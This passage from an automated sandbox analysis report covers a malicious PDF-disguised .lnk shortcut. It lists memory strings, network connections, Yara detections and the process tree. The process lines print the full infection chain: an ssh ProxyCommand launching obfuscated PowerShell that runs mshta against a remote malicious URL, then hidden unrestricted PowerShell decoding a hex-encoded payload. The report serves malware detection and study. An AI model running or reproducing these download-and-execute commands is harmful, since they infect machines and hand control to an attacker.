        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://berb.fitnessclub-filmfanatics.com/naailq0.cpl
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://berb.fitnessclub-filmfanatp
        Source: powershell.exe, 00000004.00000002.2078120843.0000024FADBC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.g
        Source: powershell.exe, 00000004.00000002.2078120843.0000024FADBC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.gX
        Source: mshta.exe, 00000005.00000003.2190556968.0000029153A92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0EB15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/a
        Source: mshta.exe, 00000005.00000002.2205452333.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2190659101.00000299565FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4
        Source: powershell.exeString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4$global:?
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4(
        Source: mshta.exe, 00000005.00000003.2190659101.00000299565E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4...
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp41
        Source: mshta.exe, 00000005.00000003.2193889505.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192336221.0000029956626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2208293493.000002995662D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp42S3
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4332c3237382c3237392c3238302c3230302c3237302c3238352c
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp45
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp46
        Source: powershell.exe, 00000004.00000002.2080055561.0000024FC5720000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4C:
        Source: mshta.exe, 00000005.00000002.2205957123.0000029153AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4H
        Source: mshta.exe, 00000005.00000003.2193889505.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192336221.0000029956626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2191535936.0000029956611000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2208293493.000002995662D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2190659101.00000299565FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4Q
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4U
        Source: mshta.exe, 00000005.00000003.2197047004.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4Yi
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4f
        Source: mshta.exe, 00000005.00000003.2192577700.0000029153A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2197047004.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205452333.0000029153A1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2193156194.0000029153A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4g
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4hZ
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp40
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp459
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4http
        Source: mshta.exe, 00000005.00000003.2200411563.000002995A67D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4https://cndef1.green-pathways.shop/api/reg/z.mp4przq
        Source: mshta.exe, 00000005.00000002.2206174245.0000029153C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4i
        Source: mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4m
        Source: powershell.exe, 00000004.00000002.2077226110.0000024FAB730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4owsPowerShel
        Source: powershell.exe, 00000004.00000002.2078120843.0000024FAD721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD86E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205299876.00000291539E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4p
        Source: mshta.exe, 00000005.00000002.2208459188.000002995A4B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2192822020.000002995A4A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cndef1.green-pathways.shop/api/reg/z.mp4werLMEMhx
        Source: powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
        Source: svchost.exe, 00000006.00000003.2103224939.000001FDFEF60000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8130C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950D3EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: mshta.exe, 00000005.00000003.2197459842.0000029153A92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2205615137.0000029153A92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2190556968.0000029153A92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000007.00000002.2172223348.0000022C901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2172223348.0000022C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C805C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CB76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000009.00000002.2356233458.000002950DDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950DDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/0v6Vhvpb
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-4530e108b6.ttf
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-74fcdd51ab.svg#iconfont
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-840387fb42.woff
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eot
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-cdfecb8456.eot?#iefix
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pss.bdstatic.com/static/superman/font/iconfont-fa013548a9.woff2
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://top.baidu.com/board?platform=pc&sa=pcindex_entry
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.360.net
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.360.net/
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.360.net/H
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E7CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E147000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownHTTPS traffic detected: 104.21.83.229:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.66.20:443 -> 192.168.2.5:49739 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 984, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF8476F24789_2_00007FF8476F2478
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 7602
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 7602Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2901Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.evad.winLNK@14/15@8/6
        Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv5g2sup.wqx.ps1Jump to behavior
        Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkVirustotal: Detection: 34%
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkReversingLabs: Detection: 26%
        Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" .
        Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://cndef1.green-pathways.shop/api/reg/z.mp4"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://cndef1.green-pathways.shop/api/reg/z.mp4Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C9475365629